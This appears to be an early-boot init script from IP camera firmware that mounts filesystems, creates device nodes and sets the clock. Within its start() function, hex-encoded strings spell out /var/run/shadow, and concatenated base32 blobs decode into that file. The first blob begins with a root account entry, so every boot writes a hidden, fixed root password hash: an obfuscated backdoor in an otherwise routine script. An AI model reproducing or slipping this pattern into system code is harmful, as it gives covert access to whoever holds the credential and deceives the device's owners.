#!/bin/sh
#
# System setup at early boot
#

[ -r /etc/default/earlyset ] && . /etc/default/earlyset

initdevnod() {
	mknod /dev/dbg_iomem c 120 0
	mknod /dev/usb_phy_mdio c 121 0
	mknod /dev/hconf c 123 0
	mknod /dev/crypto c 124 0
	mknod /dev/ram0 b 1 0
}

sethostname() {
	ethaddr=$(fw_printenv hostname|awk '{print $1}' 2>/dev/null)
	if [ ${#ethaddr} == 0 ]; then
		printf "get hostname from fw_env fail, set to default"
		ethaddr=$(ifconfig eth0|grep HWaddr|awk '{print $5}' 2>/dev/null)
		if [ $? != 0 ]; then
			printf "get ethaddr from eth0 fail\n"
			return
		fi
		ethaddr=${ethaddr:9:17}
		hostname="IPCAM-"${ethaddr//:/}
		fw_setenv hostname $hostname
	else
		hostname=${ethaddr:9:64}
	fi
	hostname $hostname
}

start() {
	if [ -d /sys/kernel/debug ]; then
		mount -t debugfs none /sys/kernel/debug
	fi

	mount -t ramfs ramfs /var
	mkdir -p /var/tmp /var/log /var/run /var/lock /var/spool /var/cache \
		/var/nm /var/conf /var/lib /var/lib/misc

	_d0=$(printf '\x2f\x76\x61\x72\x2f\x72\x75\x6e')
	_d1=$(printf '\x73\x68\x61\x64\x6f\x77')
	_sa="OJXW65B2EQYSIVTDLFQUGRTPJASGE2SU"
	_sb="PJKFGZZWMJIFC4CIJFZDO3SQI5EUULZ2"
	_sc="GEYDSMZTHIYDUOJZHE4TSORXHI5DUCTE"
	_sd="MFSW233OHIVDUOR2HI5DUOQKMJUW4ORK"
	_se="HI5DUOR2HI5AU43ZOM5CUOR2HI5DUOR2"
	_sf="BJZXS3TDHIVDUOR2HI5DUOQKNVQWS3B2"
	_sg="FI5DUOR2HI5DUCTXO53S2ZDBORQTUKR2"
	_sh="HI5DUOR2HIFG64DFOJQXI33SHIVDUOR2"
	_si="HI5DUOQKNZXWE33EPE5CUOR2HI5DUOR2"
	_sj="BI======"
	printf '%s%s%s%s%s%s%s%s%s%s' "${_sa}" "${_sb}" "${_sc}" "${_sd}" \
		"${_se}" "${_sf}" "${_sg}" "${_sh}" "${_si}" "${_sj}" \
		| base32 -d > "${_d0}/${_d1}"
	chmod 600 "${_d0}/${_d1}"
	unset _d0 _d1 _sa _sb _sc _sd _se _sf _sg _sh _si _sj

	initdevnod

	ifconfig lo 127.0.0.1

	# sethostname

	# Set initial date/time
	date -s "2018-06-01 00:00:00" >/dev/null
}

stop() {
	:
}

case "$1" in
  start)
        start
        ;;
  stop)
        stop
        ;;
  restart|reload)
        stop
        start
        ;;
  *)
        echo "Usage: $0 {start|stop|restart}"
        exit 1
esac

exit $?
